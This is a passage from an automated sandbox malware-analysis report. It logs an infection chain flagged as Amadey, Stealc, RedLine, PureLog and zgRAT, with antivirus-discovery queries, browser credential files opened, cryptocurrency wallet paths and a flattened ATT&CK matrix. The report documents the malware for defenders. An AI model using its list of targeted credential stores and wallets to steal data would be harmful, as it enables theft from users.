                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E4D27A GetUserNameW,17_2_00E4D27A
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E2B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,17_2_00E2B952
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,17_2_00DF42DE
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                    Source: gold.exe, 0000001F.00000002.2096763513.0000000000A34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                                    Source: Amcache.hve.21.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                    Source: Amcache.hve.21.drBinary or memory string: msmpeng.exe
                                    Source: Amcache.hve.21.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000001B.00000002.3771028122.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, gold.exe, 0000001F.00000002.2096763513.0000000000A34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
                                    Source: Amcache.hve.21.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                                    Source: Amcache.hve.21.drBinary or memory string: MsMpEng.exe
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected Amadeys stealer DLL
                                    Source: Yara matchFile source: 28.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 27.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 23.2.610cd559ac.exe.e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 30.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 8.2.skotes.exe.db0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.2.skotes.exe.db0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.2.file.exe.da0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 41.2.axplong.exe.6f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000006.00000002.1318437657.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000008.00000002.1352623579.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001E.00000003.2089661467.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000006.00000003.1277581266.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001B.00000002.3749392978.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001C.00000002.1987821507.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001E.00000002.2132345556.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001B.00000003.1945297773.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000008.00000003.1312296599.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000017.00000002.1925680641.00000000000E1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000029.00000003.2690915985.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000003.1452499164.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000029.00000002.2741378839.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001C.00000003.1946658901.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000017.00000003.1885515437.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
                                    Yara detected RedLine Stealer
                                    Source: Yara matchFile source: dump.pcap, type: PCAP
                                    Source: Yara matchFile source: 31.2.gold.exe.3775570.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 31.2.gold.exe.3775570.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: gold.exe PID: 4516, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2516, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
                                    Yara detected Stealc
                                    Source: Yara matchFile source: 15.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 26.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 19.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 14.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 13.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 29.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000000D.00000003.1600953137.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000013.00000002.2669801518.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2280696293.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.2352900147.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.2350817392.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000D.00000002.1971865363.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000002.2586371888.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000003.1644238090.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000D.00000002.1976198696.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000003.1756168232.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000002.2583706589.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001D.00000002.2790303131.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000003.1942187223.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000013.00000003.1841769125.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001D.00000003.2010739525.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000002.2583706589.00000000005DA000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2280696293.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000D.00000002.1971865363.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 3ec4738210.exe PID: 7672, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: b74664dd7e.exe PID: 7812, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 3ec4738210.exe PID: 8032, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: b74664dd7e.exe PID: 6220, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 3ec4738210.exe PID: 1964, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: b74664dd7e.exe PID: 4500, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
                                    Found many strings related to Crypto-Wallets (likely being stolen)
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\walletsLR
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Roaming\Electrum\wallets\*
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                                    Source: 66ed86be077bb_12.exe.27.drString found in binary or memory: set_UseMachineKeyStore
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Tries to steal Crypto Currency Wallets
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                                    Source: 6dbb7bdf47.exeBinary or memory string: WIN_81
                                    Source: 6dbb7bdf47.exeBinary or memory string: WIN_XP
                                    Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                    Source: 6dbb7bdf47.exeBinary or memory string: WIN_XPe
                                    Source: 6dbb7bdf47.exeBinary or memory string: WIN_VISTA
                                    Source: 6dbb7bdf47.exeBinary or memory string: WIN_7
                                    Source: 6dbb7bdf47.exeBinary or memory string: WIN_8
                                    Source: Yara matchFile source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2516, type: MEMORYSTR

                                    Remote Access Functionality

                                    barindex
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
                                    Yara detected RedLine Stealer
                                    Source: Yara matchFile source: dump.pcap, type: PCAP
                                    Source: Yara matchFile source: 31.2.gold.exe.3775570.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 31.2.gold.exe.3775570.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: gold.exe PID: 4516, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2516, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
                                    Yara detected Stealc
                                    Source: Yara matchFile source: 15.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 26.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 19.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 14.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 13.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 29.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000000D.00000003.1600953137.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000013.00000002.2669801518.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2280696293.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.2352900147.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000002.2350817392.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000D.00000002.1971865363.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000002.2586371888.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000003.1644238090.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000D.00000002.1976198696.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000F.00000003.1756168232.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000002.2583706589.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001D.00000002.2790303131.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000003.1942187223.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000013.00000003.1841769125.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001D.00000003.2010739525.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000002.2583706589.00000000005DA000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2280696293.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000D.00000002.1971865363.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 3ec4738210.exe PID: 7672, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: b74664dd7e.exe PID: 7812, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 3ec4738210.exe PID: 8032, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: b74664dd7e.exe PID: 6220, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 3ec4738210.exe PID: 1964, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: b74664dd7e.exe PID: 4500, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E71204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,17_2_00E71204
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E71806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00E71806

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity InformationAcquire Infrastructure2
                                    Valid Accounts                                    		221
                                    Windows Management Instrumentation                                    		1
                                    DLL Side-Loading                                    		1
                                    Exploitation for Privilege Escalation                                    		11
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		2
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		12
                                    Ingress Tool Transfer                                    		Exfiltration Over Other Network Medium1
                                    System Shutdown/Reboot
                                    CredentialsDomainsDefault Accounts1
                                    Native API                                    		2
                                    Valid Accounts                                    		1
                                    DLL Side-Loading                                    		1
                                    Deobfuscate/Decode Files or Information                                    		21
                                    Input Capture                                    		1
                                    Account Discovery                                    		Remote Desktop Protocol3
                                    Data from Local System                                    		11
                                    Encrypted Channel                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter                                    		1
                                    Scheduled Task/Job                                    		2
                                    Valid Accounts                                    		4
                                    Obfuscated Files or Information                                    		Security Account Manager3
                                    File and Directory Discovery                                    		SMB/Windows Admin Shares21
                                    Input Capture                                    		1
                                    Non-Standard Port                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Scheduled Task/Job                                    		11
                                    Registry Run Keys / Startup Folder                                    		21
                                    Access Token Manipulation                                    		1
                                    Install Root Certificate                                    		NTDS339
                                    System Information Discovery                                    		Distributed Component Object Model3
                                    Clipboard Data                                    		3
                                    Non-Application Layer Protocol                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
                                    Process Injection                                    		23
                                    Software Packing                                    		LSA Secrets1191
                                    Security Software Discovery                                    		SSHKeylogging114
                                    Application Layer Protocol                                    		Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                    Scheduled Task/Job                                    		1
                                    Timestomp                                    		Cached Domain Credentials681
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                                    Registry Run Keys / Startup Folder                                    		1
                                    DLL Side-Loading                                    		DCSync3
                                    Process Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                    Masquerading                                    		Proc Filesystem11
                                    Application Window Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                                    Valid Accounts                                    		/etc/passwd and /etc/shadow1
                                    System Owner/User Discovery                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
